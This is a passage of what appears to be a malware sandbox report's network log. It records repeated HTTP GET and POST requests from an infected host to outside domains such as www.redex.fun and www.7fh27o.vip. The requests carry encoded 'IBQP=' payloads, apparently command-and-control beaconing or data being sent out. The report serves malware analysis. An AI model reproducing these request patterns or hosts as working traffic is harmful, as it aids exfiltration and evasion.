                                                                                                Data Ascii: IBQP=kVkksTh8YzGsqf4c1IqSff6j/7T/cNIdeKb9NhJd0z2BF6nRYGIkimSGGYAUvLI0nulUnBwJbO3pqRDeGmD/fkE4GxYNn3ZxvLvBXFMb4c4oScoeaeQsdQYo0qpNXM+WBjdBaJLXyFuqHkcz44Ea1s65l5750qOdFi3rN62EI8VqHY92EeZssN/f+VFQefvYyzDMtC9pha5iHGfMl9L1nQIv4h46iTA3/0S1FI9gnj4rP7WY/MNqsHn8d6zw3U6rmqEOWzn5hIElUFNoQIw4E/GWZNWO5d9NMEIsyB8k6fqzZ2yiJza0nvkBHQ6tum28X2cpajqNhpPaSQBiSYQZ8ke4jLLVJRN4d799BNeVzsHJuEat8xX7T2JblEHeqOSVEnyzJl2s/PksiUarj+qnY47AEdPm1ljLLSHoLjEofexf1VLPAZs2PbVP/N0mkYuaRY4NGECxW3VxOET9ue/X+wJvjjVgtlQSj7b+ZVVQDgLepU7Yua8dyNvX8tCokLsqWBQY5D5bqGqORVu9P0OvN6rgIbPQYbJyWFVL5wqef/EQgKCejwq74ImSNszEvWmUHpZNVNezg1sOevbM9kkBIvWf3g/zA0syOqQMtjbwGQPh4cgnMiMf/nkknmmfJc1AxFn0UtJ6D4UJnFub8dWrljimRvJlZEGHj6UFdGjCdk8yV4aPTtvNNqbxU8A4wBNg+9oqkPB3wg7Cv2O3frYbGazufJdot1
                                                                                                Nov 11, 2024 17:05:07.650707960 CET6630OUTData Raw: 59 51 50 6f 45 74 73 43 79 49 73 62 53 47 6d 56 68 2b 4a 42 51 2f 67 38 61 65 79 6f 57 5a 69 44 41 45 79 4c 52 47 74 65 2f 36 79 62 4c 50 4d 35 6f 79 4c 6c 59 62 65 31 61 30 68 61 42 45 30 55 32 71 4b 55 42 66 41 6e 36 57 50 67 42 4f 64 68 6a 4e
                                                                                                Data Ascii: YQPoEtsCyIsbSGmVh+JBQ/g8aeyoWZiDAEyLRGte/6ybLPM5oyLlYbe1a0haBE0U2qKUBfAn6WPgBOdhjNJ68jgcUIvlEPPb/VUO9KtsQZfiqqmZBWP1tHRVXwiG/OaXgBSotqZWSZsBcfquQybSazBiHJTVYbdnWXXEFHQucx60VSEHUlRlUo4L48wGj5KcUsqR8FoYoUPoqwEeEJy2mPUFCjaa3bxxAdetxVeOoydiBzi76uq


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                61192.168.11.20498123.33.130.19080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:10.319263935 CET494OUTGET /bpf5/?IBQP=pXMEvi9dRTmSqe0Y/4GBXZDx+YOuS/91ab/OOhxfwBThN5bse0Jkmjq1VKEOxLsbrchn3SsLKrmnhDLmelrdYhtBAF1WpWB+lKbsf3p2+Ms5acdIbtU3K2Q=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.7fh27o.vip
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:05:10.454735994 CET400INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:05:10 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 42 51 50 3d 70 58 4d 45 76 69 39 64 52 54 6d 53 71 65 30 59 2f 34 47 42 58 5a 44 78 2b 59 4f 75 53 2f 39 31 61 62 2f 4f 4f 68 78 66 77 42 54 68 4e 35 62 73 65 30 4a 6b 6d 6a 71 31 56 4b 45 4f 78 4c 73 62 72 63 68 6e 33 53 73 4c 4b 72 6d 6e 68 44 4c 6d 65 6c 72 64 59 68 74 42 41 46 31 57 70 57 42 2b 6c 4b 62 73 66 33 70 32 2b 4d 73 35 61 63 64 49 62 74 55 33 4b 32 51 3d 26 4c 72 33 3d 75 48 4d 4c 54 48 52 50 43 70 73 64 61 70 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=pXMEvi9dRTmSqe0Y/4GBXZDx+YOuS/91ab/OOhxfwBThN5bse0Jkmjq1VKEOxLsbrchn3SsLKrmnhDLmelrdYhtBAF1WpWB+lKbsf3p2+Ms5acdIbtU3K2Q=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                62192.168.11.2049813185.68.16.9480
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:15.729585886 CET747OUTPOST /7tio/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Origin: http://www.redex.fun
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.redex.fun/7tio/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 52 55 6e 42 78 78 2f 4b 67 61 43 6e 72 4f 61 4a 61 77 33 57 6b 32 46 72 42 66 69 44 77 46 70 78 32 6d 6f 39 67 46 4b 59 6b 50 4e 4c 69 70 64 42 50 36 36 72 4c 6d 38 4c 6e 79 4d 59 67 62 42 59 51 49 70 76 51 51 67 57 63 59 34 77 76 54 7a 67 62 30 62 6d 59 76 36 4f 41 53 6d 51 38 65 72 5a 45 53 6a 62 42 34 48 52 46 65 47 59 7a 50 69 47 32 48 75 33 4d 67 45 5a 34 31 6c 74 4c 5a 69 43 77 55 32 62 37 51 6c 36 64 72 58 31 31 6d 69 6c 55 74 53 53 35 4e 37 4a 6d 70 5a 75 67 37 71 48 45 6c 4e 2f 35 4d 4b 4a 66 45 68 43 56 67 6c 51 73 33 32 65 67 65 42 47 76 5a 50 30 6c 65 42 6d 43 41 3d 3d
                                                                                                Data Ascii: IBQP=RUnBxx/KgaCnrOaJaw3Wk2FrBfiDwFpx2mo9gFKYkPNLipdBP66rLm8LnyMYgbBYQIpvQQgWcY4wvTzgb0bmYv6OASmQ8erZESjbB4HRFeGYzPiG2Hu3MgEZ41ltLZiCwU2b7Ql6drX11milUtSS5N7JmpZug7qHElN/5MKJfEhCVglQs32egeBGvZP0leBmCA==
                                                                                                Nov 11, 2024 17:05:15.977914095 CET735INHTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:05:15 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                63192.168.11.2049814185.68.16.9480
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:18.510823011 CET767OUTPOST /7tio/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Origin: http://www.redex.fun
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.redex.fun/7tio/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 52 55 6e 42 78 78 2f 4b 67 61 43 6e 71 75 71 4a 66 51 4c 57 7a 6d 46 6f 45 66 69 44 70 31 70 39 32 6d 73 39 67 45 50 64 6b 36 64 4c 69 4a 4e 42 64 76 4f 72 4d 6d 38 4c 76 53 4d 52 39 4c 42 58 51 49 6c 52 51 51 73 57 63 59 73 77 76 53 44 67 62 6a 48 6c 62 66 36 4d 62 43 6d 65 68 4f 72 5a 45 53 6a 62 42 34 69 4b 46 65 75 59 7a 2f 53 47 32 6d 75 77 43 41 45 65 79 56 6c 74 50 5a 6a 71 77 55 33 4d 37 53 51 66 64 76 6e 31 31 6e 79 6c 55 35 4f 4e 77 4e 37 50 37 35 59 58 6a 71 33 6a 49 6c 4e 4b 35 2b 61 68 46 6c 39 71 55 32 6f 4b 78 46 43 36 6a 4e 64 30 72 70 32 63 6e 63 41 39 66 4c 65 46 75 42 4a 77 46 48 62 6e 31 6d 4c 66 65 4b 70 53 66 38 63 3d
                                                                                                Data Ascii: IBQP=RUnBxx/KgaCnquqJfQLWzmFoEfiDp1p92ms9gEPdk6dLiJNBdvOrMm8LvSMR9LBXQIlRQQsWcYswvSDgbjHlbf6MbCmehOrZESjbB4iKFeuYz/SG2muwCAEeyVltPZjqwU3M7SQfdvn11nylU5ONwN7P75YXjq3jIlNK5+ahFl9qU2oKxFC6jNd0rp2cncA9fLeFuBJwFHbn1mLfeKpSf8c=
                                                                                                Nov 11, 2024 17:05:18.758709908 CET735INHTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:05:18 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                64192.168.11.2049815185.68.16.9480
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:21.301706076 CET2578OUTPOST /7tio/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Origin: http://www.redex.fun
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.redex.fun/7tio/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 52 55 6e 42 78 78 2f 4b 67 61 43 6e 71 75 71 4a 66 51 4c 57 7a 6d 46 6f 45 66 69 44 70 31 70 39 32 6d 73 39 67 45 50 64 6b 35 39 4c 68 37 31 42 50 63 6d 72 4e 6d 38 4c 6c 79 4d 63 39 4c 42 4f 51 49 39 64 51 51 78 70 63 61 55 77 75 30 2f 67 50 47 7a 6c 41 50 36 4d 45 53 6d 66 38 65 72 49 45 53 7a 6c 42 34 53 4b 46 65 75 59 7a 38 4b 47 77 33 75 77 53 77 45 5a 34 31 6c 68 4c 5a 6a 52 77 55 75 35 37 53 56 71 63 65 62 31 31 48 43 6c 57 4b 6d 4e 73 64 37 4e 34 35 59 6d 6a 71 37 38 49 68 74 73 35 2f 2b 4c 46 6e 64 71 58 43 30 56 68 55 4b 51 2b 4f 74 67 72 70 79 54 7a 73 45 4d 58 36 47 63 6d 67 70 6e 45 69 72 76 31 32 50 55 4d 4b 6c 79 64 38 65 55 66 4b 65 38 66 64 4e 72 74 49 4f 2b 58 42 39 44 30 75 71 70 32 7a 39 51 63 4e 35 67 59 2f 42 7a 57 73 4d 74 39 34 62 2f 64 6c 69 4a 77 35 54 42 61 51 48 72 6f 31 48 4a 71 65 49 4a 57 6c 39 74 38 51 75 63 53 33 6b 65 34 68 6c 34 6e 37 6d 32 66 62 2b 59 4d 36 43 79 4c 5a 34 67 66 79 67 47 38 6b 53 52 46 69 76 71 2f 77 4a 71 77 5a 6b 37 51 44 78 4c 69 [TRUNCATED]
                                                                                                Data Ascii: IBQP=RUnBxx/KgaCnquqJfQLWzmFoEfiDp1p92ms9gEPdk59Lh71BPcmrNm8LlyMc9LBOQI9dQQxpcaUwu0/gPGzlAP6MESmf8erIESzlB4SKFeuYz8KGw3uwSwEZ41lhLZjRwUu57SVqceb11HClWKmNsd7N45Ymjq78Ihts5/+LFndqXC0VhUKQ+OtgrpyTzsEMX6GcmgpnEirv12PUMKlyd8eUfKe8fdNrtIO+XB9D0uqp2z9QcN5gY/BzWsMt94b/dliJw5TBaQHro1HJqeIJWl9t8QucS3ke4hl4n7m2fb+YM6CyLZ4gfygG8kSRFivq/wJqwZk7QDxLi1miCE0SjioNYyzMpmlTfKo0bvZZbQvnWPXNhvGEphFyjkCI6+4GceFumRaPq/G1SiVizQd5ukWDuOcvIg8IaVD5lX0W0hfX/vZoQxxO6wTNHnshlmaHWlA6/E1LL7qAxzw6vN24S/wtCHmXa6ZQkda1d8ntvR2VG9X2amusM/i62oZi/3Nr06gOAJIDcxOp1DV+klok6YdW8JexeY83ORswwf6r7qoYb9G8mDTbTtoq3tqhFLHVRBECcy+BbP/JLBHTL26gpQ9B89XMND8mxH8Q90GZE8jkiYJ/iHy7OKjcqmYaCjw5d+Ch8gcrUAPuwVWeui+rWbbqoHvDlxS0iMQIIAdvoiXqI+/XJUF9D4qbS+VymCazIqMrnjjVWWIzHNeNy8TakZSLKXykQiUWnfATR0suJLQZ1dAgaJMyeauCS6Ff0FJYxUrZR/2jNEwn9jpLahomSYQcvl02Ml7/PeXgo+sRlB4epHsbtUk+b8zT5mxCZrlJqNG22Nf6gL5iUe3toHTY026v0nQMrWdYRRQeVGYicnVu8n32L2dSOgvRWXlt5JXLtIYFZ74XdNbkpayLbOjiiF2J/mJAogS6KFparFTqtu6uqbO38g6Hc1GWuWWWFxtwEvClV/PONvBdMQzrgQ0c3Sb2/FVimMjwD9oXurSOyNGfZt7 [TRUNCATED]
                                                                                                Nov 11, 2024 17:05:21.301724911 CET3867OUTData Raw: 6a 33 66 4b 66 67 4e 2b 4e 58 42 4b 39 4f 76 32 42 49 4f 34 4e 4f 57 41 34 4d 4e 6c 53 57 54 6e 6b 44 6d 50 73 36 4d 63 31 52 70 56 52 59 68 74 68 35 45 72 71 68 41 6a 63 30 72 70 72 34 6a 75 64 77 6d 4b 64 4a 35 6e 78 77 66 66 6a 6b 2f 68 62 59
                                                                                                Data Ascii: j3fKfgN+NXBK9Ov2BIO4NOWA4MNlSWTnkDmPs6Mc1RpVRYhth5ErqhAjc0rpr4judwmKdJ5nxwffjk/hbYaPMgqv+FnIILqn+MRzB59Ej6gBvErf2KWuD+xmo4KebQNqq7f6d/4sAxQvT131MD/BWvyNO2cU+XgeDWD86z3786EZQXir/tCgLMsCIqL5xbtKMxE1Hf9IOYXEKgOsoR0A6Y+irEUYb0y5dGD0/8O78jjnkWUCg9o
                                                                                                Nov 11, 2024 17:05:21.301800013 CET1471OUTData Raw: 6b 4a 5a 2b 61 31 50 67 73 30 4b 6e 68 4d 75 64 66 6b 5a 79 34 43 42 39 68 68 36 71 4b 43 72 37 53 72 36 6c 75 65 41 6c 66 4b 6d 6b 58 4a 6b 43 71 65 44 6a 6a 38 72 74 4f 71 4d 39 43 6f 48 70 6f 72 72 32 6d 77 6e 39 37 37 51 65 6f 43 57 70 4e 6b
                                                                                                Data Ascii: kJZ+a1Pgs0KnhMudfkZy4CB9hh6qKCr7Sr6lueAlfKmkXJkCqeDjj8rtOqM9CoHporr2mwn977QeoCWpNkePxhzbxvzVn1Lc3o3q+RNRESVSUpTSnzkICPYZGf/faB0nDcUCYtdWPYAMXGMLkCLcH7AMH3EaYL8wQBjEsVKdPOyyDdcqPM9MFVneF0EZzUfQKWfEMJl/8P3ys6xf2Y0eysNgOjYK3vO10Mq1+slhHjeylCsaKLG
                                                                                                Nov 11, 2024 17:05:21.549880028 CET735INHTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:05:21 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                65192.168.11.2049816185.68.16.9480
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:24.084741116 CET493OUTGET /7tio/?IBQP=cWPhyGnsppbegOPzdBDZ8kAQGuS94D1G+AoDqW+mjKcXo4pHCPC/PWAHmCcbh45dI7FSbj8dWK0Lqwzkb07fC7SLHWTv9NL+DwjYDKm9EtTm1O3Sw1W7F3k=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.redex.fun
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:05:24.332834005 CET1289INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:05:24 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-ray: p529:0.000
                                                                                                Data Raw: 31 37 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 54 49 54 4c 45 3e d0 a1 d0 b0 d0 b9 d1 82 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 d0 bd d0 b5 20 d0 bd d0 b0 d1 81 d1 82 d1 80 d0 be d0 b5 d0 bd 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b5 3c 2f 54 49 54 4c 45 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 64 6d 2e 74 6f 6f 6c 73 2f 70 61 72 6b 69 6e 67 2d 70 61 67 65 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 [TRUNCATED]
                                                                                                Data Ascii: 17d0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "xhtml11.dtd"><html><head> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8" /> <TITLE> www.redex.fun </TITLE> <link rel="stylesheet" href="https://cdn.adm.tools/parking-page/style.css" type="text/css" /> <script> window.languages = { 'en': { 'title': 'Website www.redex.fun not configured on server', 'h1': 'Website www.redex.fun not configured on server', '.message1': 'Website <b>www.redex.fun</b> is not configured on the hosting server.', '.message2': 'Domain address record points to our server, but this site is not served.<br>If you have recently added a site to your control panel - wait 15 minutes and your site will start working.', '.help_button': 'How can I fix this?', }, 'pl': { 'title': 'Witryna www.redex.fun niesko [TRUNCATED]
                                                                                                Nov 11, 2024 17:05:24.332942009 CET1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 31 27 3a 20 27 57 69 74 72 79 6e 61 20 3c 62 3e 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 3c 2f 62 3e 20 6e 69 65 20 6a 65 73 74 20 73 6b 6f 6e 66 69 67 75 72 6f 77 61 6e 61 20 6e 61 20 73
                                                                                                Data Ascii: '.message1': 'Witryna <b>www.redex.fun</b> nie jest skonfigurowana na serwerze hostingowym.', '.message2': 'Rekord adresu domeny wskazuje na nasz serwer, ale ta witryna nie jest obsugiwana.<br>Jeli niedawno doda
                                                                                                Nov 11, 2024 17:05:24.332952023 CET1289INData Raw: 65 64 65 78 2e 66 75 6e 3c 2f 62 3e 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 bb d0 b0 d1 88 d1 82 d0 be d0 b2 d0 b0 d0 bd d0 b8 d0 b9 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d1 96 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 d1 83 2e 27 2c
                                                                                                Data Ascii: edex.fun</b> .', '.message2': ' ,
                                                                                                Nov 11, 2024 17:05:24.332959890 CET1289INData Raw: 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 31 27 3a 20 27 d0 a1 d0 b0 d0 b9 d1 82 20 3c 62 3e 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 3c 2f 62 3e 20 d0 bd d0 b5 20 d0 bd d0 b0 d1 81 d1 82 d1 80 d0 be d0 b5 d0 bd 20 d0 bd d0 b0 20 d1 81 d0
                                                                                                Data Ascii: '.message1': ' <b>www.redex.fun</b> .', '.message2': ' ,
                                                                                                Nov 11, 2024 17:05:24.332984924 CET1122INData Raw: 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 20 64 69 73 70 6c 61 79 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d
                                                                                                Data Ascii: entListener("DOMContentLoaded", display); </script></head><body><div class="container"> <div class="content"> <div class="text"> <h1> www.redex.fun </h1>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                66192.168.11.2049817199.59.243.22780
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:29.471441031 CET780OUTPOST /m462/ HTTP/1.1
